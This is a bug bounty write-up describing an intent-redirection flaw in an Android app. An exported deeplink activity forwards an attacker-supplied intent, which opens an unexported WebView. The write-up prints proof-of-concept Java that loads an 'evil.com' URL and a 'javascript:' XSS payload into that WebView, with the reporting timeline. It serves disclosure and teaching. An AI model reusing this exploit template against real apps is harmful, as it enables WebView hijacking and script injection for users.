I am writing this article to share an interesting bug that i found in one of the private bugbounty programs in hackerone first of all I would like to thank Sayed Abdelhafiz for helping me starting doing android penetration testing and for guiding me and for sure Sergey Toshin for his Writeups
Let’s start our journey with the application
There’s 2 Activities in this attack
first one is the activity (not exported) let’s call it ```com.activity.webview```
and the second one is (exported one) ```com.Deeplink Splash activity ```
First of all i have downloaded the apk com.private.mobileapp . and then started doing my static analysing i saw that the below activity is vulnerable to intent redirection that’s because it’s using an implicit intent which may cause in opening unexported activities and Content providers
DirectDeeplinkSplashactivity.java
homeActivityIntent = (android.content.Intent) intent2.getParcelableExtra("referrerActivity");
} else {
homeActivityIntent = activity.getHomeActivityIntent();
}
activity.startActivity(homeActivityIntent);Many developers make use of this feature and create proxy components (activities, broadcast receivers and services) that take an embedded Intent and pass it to dangerous methods like startActivity(), sendBroadcast(), etc. This is dangerous because an attacker can force the app to launch a non-exported component that cannot be launched directly from another app, or to grant the attacker access to its content providers. WebView also sometimes changes a URL from a string to an Intent object, using the Intent.parseUri() method, and passes it to startActivity(). This leads to a violation of Android’s security design
after some looking in what we can access that’s protected I have found a webview not exported activity and it’s takes an url as an parameter
So let’s Start with our Proof Of Concept:-
Main.java
Intent extra = new Intent();
extra.setClassName("com.private.mobileapp", "com.activity.webview");
extra.putExtra("url", "http://evil.com/");
Intent intent = new Intent();
intent.setClassName("com.private.mobileapp", "com.DirectDeeplinkSplashactivity");
intent.putExtra("referrerActivity", extra);
startActivity(intent);and after running the Mobile app Boom it’s worked
Let’s try to try some XSS payloads to raise the impact
main.java
Intent extra = new Intent();
extra.setClassName("com.private.mobileapp", "com.activity.webview");
extra.putExtra("url", "javascript://legitimate.com/%0aalert(1)");
Intent intent = new Intent();
intent.setClassName("com.private.mobileapp", "com.DirectDeeplinkSplashactivity");
intent.putExtra("referrerActivity", extra);
startActivity(intent);And then we got our beautiful Alert
at this point I have decided to report it first and they try to raise the impact to access some private files (data/data/..) or accessing unexported content providers but the permissions was Handling perfectly so i couldn’t reach anything higher than that
Reported 19 May
Triaged 21 May
Triaged by Internal team and decided to make it Medium Severity 28 May
If you need any further assistance, please don’t hesitate to reach out to me on Discord.
Discord : dnelsaka
Oversecured Similar bug : Click Here
